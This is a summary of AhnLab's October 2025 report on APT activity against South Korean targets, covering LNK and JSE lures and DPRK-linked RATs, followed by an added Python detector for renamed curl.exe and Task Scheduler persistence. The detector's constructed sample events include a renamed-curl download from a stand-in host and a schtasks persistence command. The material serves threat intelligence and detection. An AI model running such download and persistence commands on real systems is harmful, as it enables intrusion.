October 2025 APT Attack Trends Report (South Korea)

2025-11-14 AhnLab

https://asec.ahnlab.com/en/91177/

AhnLab’s October 2025 South Korea APT trend report says spear phishing remained the dominant initial-access method, with JSE-based attacks increasing and accounting for the largest share that month. The DPRK-relevant material includes LNK lures using North Korea, inter-Korean cooperation, unification, and policy themes to deliver RAT malware such as XenoRAT and RoKRAT. One LNK pattern runs malicious PowerShell, abuses Dropbox API or Google Drive to retrieve payloads, creates additional scripts and obfuscated RAT components, and enables attacker-directed actions including keylogging and screenshot capture. Another pattern downloads AutoIt malware, copies curl.exe under a different name, registers persistence through Task Scheduler, and supports command execution, directory search, file upload, and file download. The filenames and decoy documents show targeting aligned with South Korean policy, civic, tax, human-rights, and North Korea-related audiences.
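
As an added example (not taken from AhnLab's report), the following Python triages process-creation records for two behaviours in the second LNK pattern above: curl.exe running under a different file name, and a Task Scheduler registration. It assumes Sysmon Event ID 1 field names, and it adds one heuristic of its own: a task is flagged only when its action points into a user-writable directory. The sample events, paths, task names and the prefix list are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records using Sysmon Event ID 1 field names.
# Every path, task name and URL below is invented for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe --version"},
    {"Image": r"C:\Users\Public\Music\example_copy.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"example_copy.exe -o C:\Users\Public\Music\a.dat https://example.invalid/a"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn "ExampleTask" /tr "C:\Users\Public\Music\run.exe" /sc minute /mo 10'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Backup" /tr "C:\Program Files\Vendor\backup.exe" /sc daily'},
]

# Assumption: these roots are treated as user-writable; tune per environment.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
TR_ARG = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

def basename(path):
    return PureWindowsPath(path).name.lower()

def renamed_curl(event):
    """PE version info still says curl.exe although the file name does not."""
    return (event.get("OriginalFileName", "").lower() == "curl.exe"
            and basename(event["Image"]) != "curl.exe")

def task_target_in_user_path(event):
    """schtasks /create whose /tr action points into a user-writable path."""
    cmd = event.get("CommandLine", "")
    if basename(event["Image"]) != "schtasks.exe" or "/create" not in cmd.lower():
        return False
    match = TR_ARG.search(cmd)
    if not match:
        return False
    target = (match.group(1) or match.group(2)).lower()
    return target.startswith(USER_WRITABLE)

def triage(events):
    """Return (event index, rule name) for every rule that fires."""
    findings = []
    for i, event in enumerate(events):
        if renamed_curl(event):
            findings.append((i, "renamed_curl"))
        if task_target_in_user_path(event):
            findings.append((i, "task_in_user_path"))
    return findings

if __name__ == "__main__":
    for index, rule in triage(SAMPLE_EVENTS):
        print(rule, SAMPLE_EVENTS[index]["Image"])
```

The legitimate curl.exe run and the task under Program Files are left alone; only the renamed copy and the task whose action sits under C:\Users are reported.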
